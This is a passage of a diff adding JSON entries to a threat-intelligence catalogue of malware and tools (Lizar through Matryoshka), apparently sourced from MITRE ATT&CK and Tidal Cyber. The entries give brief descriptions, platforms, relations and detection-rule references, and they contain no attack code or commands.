+ "source": "MITRE", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "992bdd33-4a47-495d-883a-58010a2f0efb", + "84615fe0-c2a5-4e07-8957-78ebc29b4635", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "393da13e-016c-41a3-9d89-b33173adecbf", + "type": "used-by" + }, + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "f74a5069-015d-4404-83ad-5ca01056c0dc", + "type": "similar" + }, + { + "dest-uuid": "1eb0bda6-e564-43eb-b440-8da9ffd39909", + "type": "similar" + } + ], + "uuid": "65d46aab-b3ce-4f5b-b1fc-871db2573fa1", + "value": "Lizar" + }, + { + "description": "[[U.S. CISA LockBit 3.0 March 2023](/references/06de9247-ce40-4709-a17a-a65b8853758b)]", + "meta": { + "id": "7c5ade8f-e93f-4ade-844a-84894270457a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "08c70ea5-9d4d-4146-826e-c5ebd5490378", + "type": "similar" + } + ], + "uuid": "37c1fbc5-58d9-48f5-a06f-887a9d404a18", + "value": "LockBit Black" + }, + { + "description": "Ransomware labeled “LockBit” was first observed in 2020, and since that time, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]\n\nLockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency (“CISA”), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware’s predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (September 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)] According to CISA, LockBit 3.0 (also known as “LockBit Black”) shares code similarities with Blackmatter and BlackCat ransomware and is “more modular and evasive\" than previous LockBit strains.[[U.S. CISA LockBit 3.0 March 2023](/references/06de9247-ce40-4709-a17a-a65b8853758b)]\n\nAccording to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims (all associated with LockBit 3.0), more than double the number of the next threat (Clop, with 179 victims).[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]\n\n**Delivered By**: Cobalt Strike[[Sentinel Labs LockBit 3.0 July 2022](/references/9a73b140-b483-4274-a134-ed1bb15ac31c)], PsExec[[NCC Group Research Blog August 19 2022](/references/8c1fbe98-5fc1-4e67-9b96-b740ffc9b1ae)]\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit\n\n**Malware Bazaar (Samples & IOCs)**: https://bazaar.abuse.ch/browse/tag/lockbit/\n\n**PulseDive (IOCs)**: https://pulsedive.com/threat/LockBit", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5047", + "source": "Tidal Cyber", + "tags": [ + "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", + "d431939f-2dc0-410b-83f7-86c458125444", + "5e7433ad-a894-4489-93bc-41e90da90019", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "37c1fbc5-58d9-48f5-a06f-887a9d404a18", + "type": "similar" + } + ], + "uuid": "08c70ea5-9d4d-4146-826e-c5ebd5490378", + "value": "LockBit 3.0" + }, + { + "description": "[LockerGoga](https://app.tidalcyber.com/software/65bc8e81-0a08-49f6-9d04-a2d63d512342) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)][[CarbonBlack LockerGoga 2019](https://app.tidalcyber.com/references/9970063c-6df7-4638-a247-6b1102289372)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0372", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "5af7a825-2d9f-400d-931a-e00eb9e27f48", + "type": "similar" + } + ], + "uuid": "65bc8e81-0a08-49f6-9d04-a2d63d512342", + "value": "LockerGoga" + }, + { + "description": "", + "meta": { + "id": "7069bbbd-00ad-4118-b656-17a9db611a65", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "7b471178-30a1-4c48-bbff-c4d2fdbb35a9", + "type": "similar" + } + ], + "uuid": "79b93082-8ee8-49c9-a5c4-4cf5309a6a5c", + "value": "Rescue" + }, + { + "description": "LogMeIn provides multiple freely available tools that can be used for remote access to systems, including the flagship Rescue tool.[[LogMeIn Homepage](/references/e113b544-82ad-4099-ab4e-7fc8b78f54bd)] Adversary groups, including the Royal ransomware operation and LAPSUS$, have used LogMeIn remote access software for initial access to and persistence within victim networks.[[CISA Royal AA23-061A March 2023](/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)][[CSRB LAPSUS$ July 24 2023](/references/f8311977-303c-4d05-a7f4-25b3ae36318b)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5073", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "0060bb76-6713-4942-a4c0-d4ae01ec2866", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + }, + { + "dest-uuid": "79b93082-8ee8-49c9-a5c4-4cf5309a6a5c", + "type": "similar" + } + ], + "uuid": "7b471178-30a1-4c48-bbff-c4d2fdbb35a9", + "value": "LogMeIn" + }, + { + "description": "[LoJax](https://app.tidalcyber.com/software/039f34e9-f379-4a24-a53f-b28ba579854c) is a UEFI rootkit used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) to persist remote access software on targeted systems.[[ESET LoJax Sept 2018](https://app.tidalcyber.com/references/bb938fea-2b2e-41d3-a55c-40ea34c00d21)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0397", + "source": "MITRE", + "tags": [ + "1efd43ee-5752-49f2-99fe-e3441f126b00" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "b865dded-0553-4962-a44b-6fe7863effed", + "type": "similar" + } + ], + "uuid": "039f34e9-f379-4a24-a53f-b28ba579854c", + "value": "LoJax" + }, + { + "description": "[Lokibot](https://app.tidalcyber.com/software/4fead65c-499d-4f44-8879-2c35b24dac68) is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. [Lokibot](https://app.tidalcyber.com/software/4fead65c-499d-4f44-8879-2c35b24dac68) can also create a backdoor into infected systems to allow an attacker to install additional payloads.[[Infoblox Lokibot January 2019](https://app.tidalcyber.com/references/17ab0f84-a062-4c4f-acf9-e0b8f81c3cda)][[Morphisec Lokibot April 2020](https://app.tidalcyber.com/references/e938bab1-7dc1-4a78-b1e2-ab2aa0a83eb0)][[CISA Lokibot September 2020](https://app.tidalcyber.com/references/df979f7b-6de8-4029-ae47-700f29157db0)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0447", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "e47ae2a7-d34d-4528-ba67-c9c07daa91ba", + "type": "used-by" + }, + { + "dest-uuid": "cb741463-f0fe-42e0-8d45-bc7e8335f5ae", + "type": "similar" + } + ], + "uuid": "4fead65c-499d-4f44-8879-2c35b24dac68", + "value": "Lokibot" + }, + { + "description": "[LookBack](https://app.tidalcyber.com/software/bfd2a077-5000-4500-82c4-5c85fb98dd5a) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://app.tidalcyber.com/software/bfd2a077-5000-4500-82c4-5c85fb98dd5a).[[Proofpoint LookBack Malware Aug 2019](https://app.tidalcyber.com/references/77887f82-7815-4a91-8c8a-f77dc8a9ba53)][[Dragos TALONITE](https://app.tidalcyber.com/references/f8ef1920-a4ad-4d65-b9de-8357d75f6929)][[Dragos Threat Report 2020](https://app.tidalcyber.com/references/8bb3147c-3178-4449-9978-f1248b1bcb0a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0582", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c9ccc4df-1f56-49e7-ad57-b383e1451688", + "type": "similar" + } + ], + "uuid": "bfd2a077-5000-4500-82c4-5c85fb98dd5a", + "value": "LookBack" + }, + { + "description": "LostMyPassword is a tool used to recover passwords from Windows systems.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5035", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "41041d5d-0866-4a57-92b7-d075d8b344ad", + "value": "LostMyPassword" + }, + { + "description": "[LoudMiner](https://app.tidalcyber.com/software/f503535b-406c-4e24-8123-0e22fec995bb) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.[[ESET LoudMiner June 2019](https://app.tidalcyber.com/references/f1e4ff9e-cb6c-46cc-898e-5f170bb5f634)]", + "meta": { + "platforms": [ + "macOS", + "Windows" + ], + "software_attack_id": "S0451", + "source": "MITRE", + "tags": [ + "a2e000da-8181-4327-bacd-32013dbd3654" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f99f3dcc-683f-4936-8791-075ac5e58f10", + "type": "similar" + } + ], + "uuid": "f503535b-406c-4e24-8123-0e22fec995bb", + "value": "LoudMiner" + }, + { + "description": "[LOWBALL](https://app.tidalcyber.com/software/fce1117a-e699-4aef-b1fc-04c3967acc33) is malware used by [admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. [[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0042", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "8567136b-f84a-45ed-8cce-46324c7da60e", + "type": "used-by" + }, + { + "dest-uuid": "2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b", + "type": "similar" + } + ], + "uuid": "fce1117a-e699-4aef-b1fc-04c3967acc33", + "value": "LOWBALL" + }, + { + "description": "[Lslsass](https://app.tidalcyber.com/software/37a5ae23-3da5-4cbc-a21a-a7ef98a3b7cc) is a publicly-available tool that can dump active logon session password hashes from the lsass process. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0121", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "2fab555f-7664-4623-b4e0-1675ae38190b", + "type": "similar" + } + ], + "uuid": "37a5ae23-3da5-4cbc-a21a-a7ef98a3b7cc", + "value": "Lslsass" + }, + { + "description": "[Lucifer](https://app.tidalcyber.com/software/723d9a27-74fd-4333-a8db-63df2a8b4dd4) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.[[Unit 42 Lucifer June 2020](https://app.tidalcyber.com/references/3977a87a-2eab-4a67-82b2-10c9dc7e4554)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0532", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "54a73038-1937-4d71-a253-316e76d5413c", + "type": "similar" + } + ], + "uuid": "723d9a27-74fd-4333-a8db-63df2a8b4dd4", + "value": "Lucifer" + }, + { + "description": "", + "meta": { + "id": "a33a6a59-fc2d-42bd-8555-dd696de2421f" + }, + "related": [ + { + "dest-uuid": "0cc9e24b-d458-4782-a332-4e4fd68c057b", + "type": "similar" + } + ], + "uuid": "4905b225-105e-4aec-af6e-16466cc7b717", + "value": "Enfal" + }, + { + "description": "[Lurid](https://app.tidalcyber.com/software/0cc9e24b-d458-4782-a332-4e4fd68c057b) is a malware family that has been used by several groups, including [PittyTiger](https://app.tidalcyber.com/groups/60936d3c-37ed-4116-a407-868da3aa4446), in targeted attacks as far back as 2006. [[Villeneuve 2014](https://app.tidalcyber.com/references/a156e24e-0da5-4ac7-b914-29f2f05e7d6f)] [[Villeneuve 2011](https://app.tidalcyber.com/references/ed5a2ec0-8328-40db-9f58-7eaac4ad39a0)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0010", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "60936d3c-37ed-4116-a407-868da3aa4446", + "type": "used-by" + }, + { + "dest-uuid": "251fbae2-78f6-4de7-84f6-194c727a64ad", + "type": "similar" + }, + { + "dest-uuid": "4905b225-105e-4aec-af6e-16466cc7b717", + "type": "similar" + } + ], + "uuid": "0cc9e24b-d458-4782-a332-4e4fd68c057b", + "value": "Lurid" + }, + { + "description": "[[360 Machete Sep 2020](https://app.tidalcyber.com/references/682c843d-1bb8-4f30-9d2e-35e8d41b1976)]", + "meta": { + "id": "53f691a0-57a8-4c74-a0cd-ff26db31cc2a" + }, + "related": [ + { + "dest-uuid": "be8a1630-9562-41ad-a621-65989f961a10", + "type": "similar" + } + ], + "uuid": "a4493a61-fd76-4668-83e3-f708beb2c553", + "value": "Pyark" + }, + { + "description": "[Machete](https://app.tidalcyber.com/software/be8a1630-9562-41ad-a621-65989f961a10) is a cyber espionage toolset used by [Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.[[ESET Machete July 2019](https://app.tidalcyber.com/references/408d5e33-fcb6-4d21-8be9-7aa5a8bd3385)][[Securelist Machete Aug 2014](https://app.tidalcyber.com/references/fc7be240-bd15-4ec4-bc01-f8891d7210d9)][[360 Machete Sep 2020](https://app.tidalcyber.com/references/682c843d-1bb8-4f30-9d2e-35e8d41b1976)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0409", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a3be79a2-3d4f-4697-a8a1-83f0884220af", + "type": "used-by" + }, + { + "dest-uuid": "35cd1d01-1ede-44d2-b073-a264d727bc04", + "type": "similar" + }, + { + "dest-uuid": "a4493a61-fd76-4668-83e3-f708beb2c553", + "type": "similar" + } + ], + "uuid": "be8a1630-9562-41ad-a621-65989f961a10", + "value": "Machete" + }, + { + "description": "[[ESET DazzleSpy Jan 2022](https://app.tidalcyber.com/references/212012ac-9084-490f-8dd2-5cc9ac6e6de1)]", + "meta": { + "id": "79fc744d-4280-41e8-93bf-32c6264a604f" + }, + "related": [ + { + "dest-uuid": "7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb", + "type": "similar" + } + ], + "uuid": "09e6536d-b970-43ae-a1ac-cea3a523635c", + "value": "DazzleSpy" + }, + { + "description": "[[Objective-See MacMa Nov 2021](https://app.tidalcyber.com/references/7240261e-d901-4a68-b6fc-deec308e8a50)]", + "meta": { + "id": "6abb253d-1b77-4b95-8b4d-8fcba4a3104b" + }, + "related": [ + { + "dest-uuid": "7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb", + "type": "similar" + } + ], + "uuid": "246b0d77-743e-413a-8e7a-76a5a4b391de", + "value": "OSX.CDDS" + }, + { + "description": "[MacMa](https://app.tidalcyber.com/software/7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb) is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. [MacMa](https://app.tidalcyber.com/software/7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb) has been observed in the wild since November 2021.[[ESET DazzleSpy Jan 2022](https://app.tidalcyber.com/references/212012ac-9084-490f-8dd2-5cc9ac6e6de1)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S1016", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "bdee9574-7479-4073-a7dc-e86d8acd073a", + "type": "similar" + }, + { + "dest-uuid": "09e6536d-b970-43ae-a1ac-cea3a523635c", + "type": "similar" + }, + { + "dest-uuid": "246b0d77-743e-413a-8e7a-76a5a4b391de", + "type": "similar" + } + ], + "uuid": "7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb", + "value": "MacMa" + }, + { + "description": "[macOS.OSAMiner](https://app.tidalcyber.com/software/74feb557-21bc-40fb-8ab5-45d3af84c380) is a Monero mining trojan that was first observed in 2018; security researchers assessed [macOS.OSAMiner](https://app.tidalcyber.com/software/74feb557-21bc-40fb-8ab5-45d3af84c380) may have been circulating since at least 2015. [macOS.OSAMiner](https://app.tidalcyber.com/software/74feb557-21bc-40fb-8ab5-45d3af84c380) is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)][[VMRay OSAMiner dynamic analysis 2021](https://app.tidalcyber.com/references/47a5d32d-e6a5-46c2-898a-e45dc42371be)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S1048", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "2a59a237-1530-4d55-91f9-2aebf961cc37", + "type": "similar" + } + ], + "uuid": "74feb557-21bc-40fb-8ab5-45d3af84c380", + "value": "macOS.OSAMiner" + }, + { + "description": "[MacSpy](https://app.tidalcyber.com/software/e5e67c67-e658-45b5-850b-044312be4258) is a malware-as-a-service offered on the darkweb [[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)].", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0282", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f72251cb-2be5-421f-a081-99c29a1209e7", + "type": "similar" + } + ], + "uuid": "e5e67c67-e658-45b5-850b-044312be4258", + "value": "MacSpy" + }, + { + "description": "[Mafalda](https://app.tidalcyber.com/software/7506616c-b808-54fb-9982-072a0dcf8a04) is a flexible interactive implant that has been used by [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b). Security researchers assess the [Mafalda](https://app.tidalcyber.com/software/7506616c-b808-54fb-9982-072a0dcf8a04) name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. [[SentinelLabs Metador Sept 2022](https://app.tidalcyber.com/references/137474b7-638a-56d7-9ce2-ab906f207175)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1060", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b", + "type": "used-by" + }, + { + "dest-uuid": "3be1fb7a-0f7e-415e-8e3a-74a80d596e68", + "type": "similar" + } + ], + "uuid": "7506616c-b808-54fb-9982-072a0dcf8a04", + "value": "Mafalda" + }, + { + "description": "MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.[[GitHub MailSniper](https://app.tidalcyber.com/references/50595548-b0c6-49d1-adab-43c8969ae716)]", + "meta": { + "platforms": [ + "Azure AD", + "Office 365", + "Windows" + ], + "software_attack_id": "S0413", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "b5c28235-d441-40d9-8da2-d49ba2f2568b", + "type": "used-by" + }, + { + "dest-uuid": "999c4e6e-b8dc-4b4f-8d6e-1b829f29997e", + "type": "similar" + } + ], + "uuid": "d762974a-ca7e-45ee-bc1d-f5218bf46c84", + "value": "MailSniper" + }, + { + "description": "[[Makecab.exe - LOLBAS Project](/references/6473e36b-b5ad-4254-b46d-38c53ccbe446)]", + "meta": { + "id": "a82ef541-630b-4801-aa84-2129c04f7d5a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "cf7f05a7-4093-4855-b9d9-b93226056aec", + "type": "similar" + } + ], + "uuid": "be6d153d-2288-4519-bade-cca6c8ae2aa8", + "value": "Makecab.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary to package existing files into a cabinet (.cab) file\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\makecab.exe\n* C:\\Windows\\SysWOW64\\makecab.exe\n\n**Resources:**\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_alternate_data_streams.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml)\n* Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml)\n* IOC: Makecab retrieving files from Internet\n* IOC: Makecab storing data into alternate data streams[[Makecab.exe - LOLBAS Project](/references/6473e36b-b5ad-4254-b46d-38c53ccbe446)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5123", + "source": "Tidal Cyber", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "be6d153d-2288-4519-bade-cca6c8ae2aa8", + "type": "similar" + } + ], + "uuid": "cf7f05a7-4093-4855-b9d9-b93226056aec", + "value": "Makecab" + }, + { + "description": "[[Manage-bde.wsf - LOLBAS Project](/references/74d5483e-2268-464c-a048-bb1f25bbfc4f)]", + "meta": { + "id": "2309f2fb-b0ae-4957-847c-43fc9628608e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9b6b705e-55ae-4d9e-9c57-baf1358cc324", + "type": "similar" + } + ], + "uuid": "8c479a90-537a-4661-ba2a-7e9e7ca5d04a", + "value": "Manage-bde.wsf" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Script for managing BitLocker\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\manage-bde.wsf\n\n**Resources:**\n* [https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712](https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712)\n* [https://twitter.com/bohops/status/980659399495741441](https://twitter.com/bohops/status/980659399495741441)\n* [https://twitter.com/JohnLaTwC/status/1223292479270600706](https://twitter.com/JohnLaTwC/status/1223292479270600706)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_manage_bde.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml)\n* IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations[[Manage-bde.wsf - LOLBAS Project](/references/74d5483e-2268-464c-a048-bb1f25bbfc4f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5259", + "source": "Tidal Cyber", + "tags": [ + "ff10869f-fed4-4f21-b83a-9939e7381d6e", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "8c479a90-537a-4661-ba2a-7e9e7ca5d04a", + "type": "similar" + } + ], + "uuid": "9b6b705e-55ae-4d9e-9c57-baf1358cc324", + "value": "Manage-bde" + }, + { + "description": "[MarkiRAT](https://app.tidalcyber.com/software/40806539-1496-4a64-b740-66f6a1467f40) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://app.tidalcyber.com/groups/275ca7b0-3b21-4c3a-8b6f-57b6f0ffb6fb) since at least 2015.[[Kaspersky Ferocious Kitten Jun 2021](https://app.tidalcyber.com/references/b8f8020d-3f5c-4b5e-8761-6ecdd63fcd50)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0652", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "275ca7b0-3b21-4c3a-8b6f-57b6f0ffb6fb", + "type": "used-by" + }, + { + "dest-uuid": "532c6004-b1e8-415b-9516-f7c14ba783b1", + "type": "similar" + } + ], + "uuid": "40806539-1496-4a64-b740-66f6a1467f40", + "value": "MarkiRAT" + }, + { + "description": "[Matryoshka](https://app.tidalcyber.com/software/eeb700ea-2819-46f4-936d-f7592f20dedc) is a malware framework used by [CopyKittens](https://app.tidalcyber.com/groups/6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. [[ClearSky Wilted Tulip July 2017](https://app.tidalcyber.com/references/50233005-8dc4-4e91-9477-df574271df40)] [[CopyKittens Nov 2015](https://app.tidalcyber.com/references/04e3ce40-5487-4931-98db-f55da83f412e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0167", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b", + "type": "used-by" + }, + { + "dest-uuid": "1cc934e4-b01d-4543-a011-b988dfc1a458", + "type": "similar" + } + ], + "uuid": "eeb700ea-2819-46f4-936d-f7592f20dedc", + "value": "Matryoshka" + 